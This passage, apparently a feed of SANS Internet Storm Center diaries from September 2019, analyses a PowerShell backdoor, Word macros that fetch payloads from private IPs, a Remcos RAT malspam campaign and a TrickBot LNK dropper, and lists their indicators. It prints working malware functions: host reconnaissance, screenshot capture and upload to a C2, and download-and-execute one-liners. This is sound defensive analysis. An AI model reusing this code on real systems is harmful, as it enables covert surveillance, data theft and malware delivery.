[QE7K9ZJvi46.QE7K9ZJvi46]::p9Dq()

You can find all the functions in the DLL using your favourite disassembler:

************************************************************** * FUNCTION * ************************************************************** void p9Dq-57-8272() void <VOID> <RETURN> p9Dq-57-8272 0040205c 28 06 SUB byte ptr [ESI],AL 0040205e 00 00 ADD byte ptr [EAX],AL 00402060 0a 6f 07 OR CH,byte ptr [EDI + 0x7] 00402063 00 00 ADD byte ptr [EAX],AL 00402065 0a 0a OR CL,byte ptr [EDX] 00402067 28 08 SUB byte ptr [EAX],CL 00402069 00 00 ADD byte ptr [EAX],AL 0040206b 0a 6f 09 OR CH,byte ptr [EDI + 0x9] 0040206e 00 00 ADD byte ptr [EAX],AL 00402070 0a 6f 0a OR CH,byte ptr [EDI + 0xa] 00402073 00 00 ADD byte ptr [EAX],AL 00402075 0a 17 OR DL,byte ptr [EDI] 00402077 8d 0e LEA ECX,[ESI] 00402079 00 00 ADD byte ptr [EAX],AL 0040207b 01 13 ADD dword ptr [EBX],EDX 0040207d 04 11 ADD AL,0x11 0040207f 04 16 ADD AL,0x16 00402081 1f POP DS 00402082 2d 9d 11 SUB EAX,0x6f04119d 04 6f 00402087 0b 00 OR EAX,dword ptr [EAX]

What does the malware do? First, it collects information about the infected host:

function kvhLZVVHv40() { if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN)) { $HmHCMAj1gp = "DOMAIN: NO`n`n" } else { $HmHCMAj1gp = "DOMAIN: YES`n`n"} $HmHCMAj1gp += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n") $HmHCMAj1gp += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n") $HmHCMAj1gp += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n") $HmHCMAj1gp += "`n`nNETVIEW:`n`n" + ((net view) -join "`n") $HmHCMAj1gp += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n") $HmHCMAj1gp += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n") $HmHCMAj1gp += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n") $HmHCMAj1gp += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n") $HmHCMAj1gp += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String) $HmHCMAj1gp += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp) PMQty 0 $V6VCS }

Collected data are sent to a C2:

function PMQty([int]$Wg94, [byte[]]$V6VCS) { $sdo7g = "https://$F36ui/" + [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true) $hwv80v = [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD($V6VCS) (New-Object System.Net.WebClient).UploadData($sdo7g, $hwv80v) }

The C2 is contacted via a Base64-encoded IP address and the DLL function EA2gkql9ya() generates random URI like:

hxxps://23[.]227[.]193[.]48/ddqxyg/g1/cbahpbp1y/im/g/asg/3izld2/2s5kq5xexs4h5mwc/xr51fqv2p/4zm/e.jpg

Using the same technique, the malware exfiltrates the content of the following registry keys (related to different versions of Outlook):

  • hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*
  • hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*
  • hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*

What could be also interesting? A screen capture of the desktop! Here is the function which performs the screenshot:

function cY0yMOo7U3() { Add-Type -Assembly System.Windows.Forms $Ze8Fpb5KC = [Windows.Forms.SystemInformation]::VirtualScreen $Rpmv5HB = New-Object Drawing.Bitmap $Ze8Fpb5KC.Width, $Ze8Fpb5KC.Height $ntkkayAduow = [Drawing.Graphics]::FromImage($Rpmv5HB) $ntkkayAduow.CopyFromScreen($Ze8Fpb5KC.Location, [Drawing.Point]::Empty, $Ze8Fpb5KC.Size) $ntkkayAduow.Dispose() $UkzcuaUqgj = New-Object System.IO.MemoryStream $noFMcdA6cKj=40 $hwv80voderParams = New-Object System.Drawing.Imaging.EncoderParameters $hwv80voderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $noFMcdA6cKj) $OmDwFp = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" } $Rpmv5HB.save($UkzcuaUqgj, $OmDwFp, $hwv80voderParams) $Rpmv5HB.Dispose() $V6VCS = [convert]::ToBase64String($UkzcuaUqgj.ToArray()) $V6VCS = [System.Text.Encoding]::ASCII.GetBytes($V6VCS) PMQty 2 $V6VCS }

Once initial data have been exfiltrated, the malware enters a loop. It queries the C2 at random interval:

Start-Sleep -s (Get-Random -Input @(200..260))

Depending on the C2 answer, the malware performs the following tasks:

  • Execute the provided PowerShell code and send results back (remote code execution)
  • Dump a DLL on disk with a random name
  • Dump a PE on disk with a random name and executes it

Unfortunately, the C2 is down at the moment, so I can't grab the DLL/PE files.

The script (SHA256:9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b) has a very low VT score (3/57)[1].
The DLL (SHA256:18580a1789d26c123f3c41fe23f2085de7650a177fdb2623704b748de4403bf3) has a score of 6/71[2].

[1] https://www.virustotal.com/gui/file/9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b/detection
[2] https://www.virustotal.com/gui/file/18580a1789d26c123f3c41fe23f2085de7650a177fdb2623704b748de4403bf3/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 6.

ISC Stormcast For Friday, September 6th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6654, (Fri, Sep 6th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 5.

Private IP Addresses in Malware Samples&#x3f;, (Thu, Sep 5th)

I'm looking for some samples on VT that contains URLs with private or non-routable IP addresses (RFC1918)[1]. I found one recently and it made me curious. Why would a malware try to connect to a non-routable IP address?

Here is an example of a macro found in a suspicious Word document (SHA256: c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a)[2]: 

Sub AutoOpen() ' ' test Macro ' ' x = URLDownloadToFileA(0, "http://10.200.235.200:/loader.dll", Environ("TEMP") & "\loader.dll", 0, 0) End Sub

This one seems to be ongoing development and does not look too dangerous. But, wait, the use of VirusTotal can be very sensitive depending on your context and submitting files to VirusTotal must be performed carefully. If you are a Blue-teamer, uploading a sample might ring a bell at the attacker and let him know that you're looking at him. If you're a Red-teamer, uploading your self-made sample might help AV vendors to improve their detection mechanisms.

Here is another one found in another document with a higher VT score (22/57)[3]

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle) strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('http://172.16.17.22/PowerUpDev.ps1')" Set WshShell = CreateObject("WScript.Shell") Set WshShellExec = WshShell.Exec(strCommand) strOutput = WshShellExec.StdOut.ReadAll MsgBox strOutput End Sub

Besides classic macros, I found also a lot of DLL's and DEX files (Dalvik Executable from Android applications) that contains URLs with RFC1918 IP addresses.  I think that most of them are samples still being tested/developed.

[1] https://tools.ietf.org/html/rfc1918
[2] https://www.virustotal.com/gui/file/c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a/detection
[3] https://www.virustotal.com/gui/file/cdd3bdced038414f84c318fdc4b2e6573e99900fb792dd417869721cc7975b84/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 5.

ISC Stormcast For Thursday, September 5th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6652, (Thu, Sep 5th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 4.

ISC Stormcast For Wednesday, September 4th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6650, (Wed, Sep 4th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 4.

Malspam using password-protected Word docs to push Remcos RAT, (Wed, Sep 4th)

Introduction

Malicious spam (malspam) using attached password-protected Word documents to evade detection is nothing new.  I've documented it as early as March 2017, and this style of malware distribution started years before then.  This particular campaign has pushed a variety of malware, including IcedID (Bokbot), various types of ransomware, and Nymaim.  This diary from 2018 has a list of different types of malware seen from this campaign during that year.

At times, this resume-themed malspam can disappear for several weeks, but I always see it return.  This most recent wave began as early as Wednesday 2019-08-28.  When I checked on Tuesday 2019-09-03, this infection chain pushed Remcos RAT.

Today's diary reviews characteristics of this infection chain.

Malspam

Recent malspam looks similar to a diary I wrote in March 2019 and a blog I posted almost two months later in May.  This time, the sending addresses were all probably spoofed, and they all end with @t-online.de.  Attachment names all end with resume.doc.  I've pasted the dates, times, sending addresses, subject lines, and attachment names here.


Shown above:  Dates, times, senders, subject lines, and attachment names for recent malspam from this campaign.

I was not able to find an example of the malspam from this most recent wave of emails; however, the image below shows what these emails typically look like.


Shown above:  What this malspam typically looks like.

Attached Word documents

The attached Word documents use 123 as the password.  These Word documents have macros, and the visual template looks remarkably similar to previous examples I've reviewed.


Shown above:  Recent example of an attached Word document from this malspam campaign.  The password is 123


Shown above:  The Word document after it is unlocked by the password.

Infection traffic

Infection traffic was similar to what I've seen before from this campaign.  First was an HTTP request that returned a Windows executable file.  In this case, the initial URL ended in .jpg.  This was followed by post-infection traffic over TCP ports 2404 and 2405.  When I ran the same Word document through an Any.Run sandbox, it also generated two DNS queries not seen during my infection traffic.


Shown above:  Traffic from an infection in my lab, filtered in Wireshark.


Shown above:  The initial HTTP request returned a Windows executable file.


Shown above:  Post-infection traffic generated by Remcos RAT (1 of 2).


Shown above:  Post-infection traffic generated by Remcos RAT (2 of 2).


Shown above:  Traffic caused by running the Word document in the Any.Run sandbox (link).

Forensics on the infected Windows host

The initial Windows executable (EXE) file was saved to the user's AppData\Local\Temp directory.  It generated an EXE that was slightly over 400 MB, which kept Remcos RAT persistent on the infected Windows host.  This Remcos RAT sample also updated the Windows registry to stay persistent after a reboot.


Shown above:  Windows executable files associated with this Remcos RAT infection.


Shown above:  Remcos RAT persistent on the infected Windows host.


Shown above:  Windows registry updates caused by this Remcos RAT sample.

Indicators of Compromise (IoCs)

Infection traffic:

  • 104.244.74[.]243 port 80 - 104.244.74[.]243 - GET /pine.jpg
  • 37.19.193[.]217 port 2404 - encoded TCP traffic caused by Remcos RAT
  • 37.19.193[.]217 port 2405 - encoded TCP traffic caused by Remcos RAT
  • 209.141.40[.]183 port 2404 - toptoptop3[.]online - attempted TCP connection (caused by Remcos RAT)
  • 209.141.40[.]183 port 2404 - toptoptop3[.]site - attempted TCP connection (caused by Remcos RAT)

Associated files:

SHA256 hash: 932505acc15faede0993285532ed6d5afb27ce1c591a0819653ea5813d11cd55

  • File size: 37,752 bytes
  • File name: Takisha resume.doc
  • File description: Password-protected Word doc -- Password: 123

SHA256 hash: fa9a94b32f7fa1e1e3eef63d3fb9003fda8d295e1f1a3e521691725e4c7da9f3

  • File size: 1,064,960 bytes
  • File location: hxxp://104.244.74[.]243/pine.jpg
  • File location: C:\Users\[username]\AppData\Local\Temp\distanc1e.exe
  • File description: initial installer EXE for Recmos RAT, retrieved by macro from the above Word doc

SHA256 hash: c866c269cd1617ee739216e24ba7cd1b392684b441bcdf10a6c0fdba073fbc28

  • File size: 400,749,569 bytes
  • File location: C:\Users\[username]\AppData\Local\Temp\IXP000.TMP\REMCOS~4.EXE (deleted itself)
  • File location: C:\Users\[username]\Jos5\FO.exe
  • File description: Remcos RAT

Final words

Remcos RAT is not the only malware distributed by this campaign.  In previous months, other families of malware have been seen from this malspam, most recently IcedID (Bokbot).  Detection rates on the attached Word documents are very low, since they are encrypted and use password protection.  However, spam filters and proper system administrative practices like Software Restriction Policies (SRP) or AppLocker will easily prevent these types of infections on Windows-based systems.

Pcap and malware for this diary can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 3.

&#x5b;Guest Diary&#x5d; Tricky LNK points to TrickBot, (Tue, Sep 3rd)

[This is a guest diary submitted by Jan Kopriva. Jan is working for Alef Nula (http://www.alef.com) and you can follow him on Twitter at @jk0pr]

Recently, I was asked to analyze a phishing e-mail which was sent to one of our customers. The e-mail itself was a run of the mill affair (a variation on the “you have unpaid invoices, click here to download them” theme), but the link it contained pointed to a quite interesting file. The file in question was a ZIP archive containing an unusually large (almost 10 kB) LNK file trying to look like an RTF document. 
 

At the time of the original analysis, both the ZIP and LNK files were detected as malicious by 2/59 AV engines according to VirusTotal, while at the time of writing it was 19/59 for the shortcut file and 18/59 for the archive file.
The target set in the LNK shortcut was:

%comspec% /v:on /c hwqcG & if not exist tPUQl (set "fChXE=inds") & (f!fChXE!tr "LMpJG.*" OutstandingPayment.lnk > "%tmp%\NWrfK.vbs" & "%tmp%\NWrfK.vbs") & qFctA

It contains some elementary obfuscation, which makes it harder to read at first, but if we clean it up, it basically comes down to:

cmd.exe /c findstr "LMpJG.*" OutstandingPayment.lnk > "%tmp%\NWrfK.vbs" & "%tmp%\NWrfK.vbs"

In other words, it will try to find the string “LMpJG” in the LNK file itself, save this string and everything after it in a file named NWrfK.vbs in Temp directory and then execute this file. If we try to look for the string “LMpJG” in our LNK file manually, we will discover why the shortcut file seemed so unusually large – it indeed contains (obfuscated) VBScript code.

Before we take a look at the VBS code itself, we should mention how this is possible. Windows doesn’t care (or rather doesn’t care too much – there are some caveats) if you append arbitrary bytes after the end of an otherwise well-formed LNK file. If you try to execute such a shortcut, the OS simply disregards the extra content. This allows the shortcut file we have here to act as a dropper for a VBS file. Although it is not a new technique – this and other types of malicious LNKs have been used in phishing campaigns for a long time – it isn’t as common as many others, and thus not many are aware of the dangers of malicious LNKs (i.e., if you teach any security awareness courses, mentioning the topic of malicious LNKs when you discuss potentially dangerous e-mail attachments might not be a bad idea).
The VBScript contained within our LNK file looks like this:

LMpJGURpXGYocTvvOhCq = "UULDhIzzHvQYdkTEvAQynUxZYSBcazBoIpRrNUdFZONadEIMDSyYGLBHimkJkDaqfNVMNzdwvREtsAnPLDTXimsqmHdwzZHcStdw" : execute("Set nhkIuUxqIvXRnkkZMhFF = CreateObject(""S""&""cripting.FileSyst""&""emObject"") : IJuHSmVXnBZQPrvVzBLI = ""chr(120-9Afn114-4Afn41-9Afn105-4Afn123-9Afn115-1Afn115-
...[code omitted]…
-7Afn105-4Afn119-3Afn102-1)""") : If  nhkIuUxqIvXRnkkZMhFF.FileExists("OeEgCMUjcEQtYoJaBeaj")=false Then ASdzIQAOucoVcutsePYR = replace(IJuHSmVXnBZQPrvVzBLI, "Afn", ")+chr(") : execute(eval(ASdzIQAOucoVcutsePYR))

Although we could deobfuscate it by hand or using some specialized tools, it is usually easiest to let a code deobfuscate itself and give us its readable version. In this case, it can be as simple as changing the last “execute” to “MsgBox” and running the code.

We may see that the VBScript code tries to access the credits.php page using HTTP GET request and save the response as 5767904_7391395_2818162.exe in the Temp directory. It then tries to run the downloaded EXE file and delete itself. When accessed, credits.php indeed returned (it is no longer operational at the time of writing) a valid executable file named “akz005e6f.exe”, which tried to pass itself as the Active Accessibility Event Hooks Library from Microsoft.

It probably won’t come as a surprise that our executable isn’t one of Windows libraries, but rather something more insidious. In fact, VirusTotal score of the file at the time of writing is 40/69, with multiple AV engines correctly detecting it as a variant of TrickBot.

When executed, our EXE file copies itself into ProgramData under the name “??????????.exe” and then closes the original instance of itself and runs the newly created one. The new instance then tries to turn off Windows Defender by disabling its capabilities through the use of Powershell (which is fairly usual for TrickBot [1]) and stopping and deleting its service.






It then achieves persistence by copying itself into %appdata%\msspeedlib\ directory and creates a scheduled task named “Ms speed internet library,” which starts the newly created instance of the executable at system startup.

It seems that authors of this variant of TrickBot probably felt some special animosity towards Windows Defender at the time when they were creating the code as the original name of the project seems to have been “Stupid Windios Defender.”

After letting the malware run for a while in a sandbox with Wireshark capturing network traffic, couple of things caught my eye (besides the fact that Edge stopped working and that the malware tried to upload information about the compromised system to a remote server). One of them was evidence of an ARP sweep of the local network conducted from the infected machine. TrickBot has a well-known capability to interact with remote systems within local networks; however, I didn’t know it used a sequential ARP sweep to discover these systems.

The other interesting activity was a download of what appeared to be two PNG files (“samerton.png” and “tablone.png”) from a remote HTTP server. As a quick look at their magic bytes (MZ) and the DOS stub shows, the files in question are not pictures but Windows executables. On closer inspection, it becomes obvious that although the files are not completely identical, their differences are only very minor and that both are samples (most likely updated ones) of TrickBot.

Just as our original executable tried to appear as a legitimate Microsoft library, so do these two. The only difference is that in the case of fake PNGs, their authors chose to disguise them as “Print UI Cache” instead of the Active Accessibility Event Hooks Library.

At the time of writing, “tablone.exe” has VirusTotal score of 18/68 and “samerton.exe” score of 17/67.
Although we will stop here, it is interesting to note how far an analysis of a simple LNK file has already taken us – the next chart shows relationships between all the files mentioned in the diary and under it, you may find MD5 hashes of all three TrickBot samples.

•    9F644F47C636C47C8908F9E68FF4AD84 – akz005e6f.exe
•    2F97A820A4AC94D1435417921ED82489 – samerton.exe
•    F94FE1E4DB524EDAD8BE15BE2523BAEF – tablone.exe

[1] https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/
 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 3.

ISC Stormcast For Tuesday, September 3rd 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6648, (Tue, Sep 3rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. szeptember 2.

ISC Stormcast For Monday, September 2nd 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6646, (Mon, Sep 2nd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.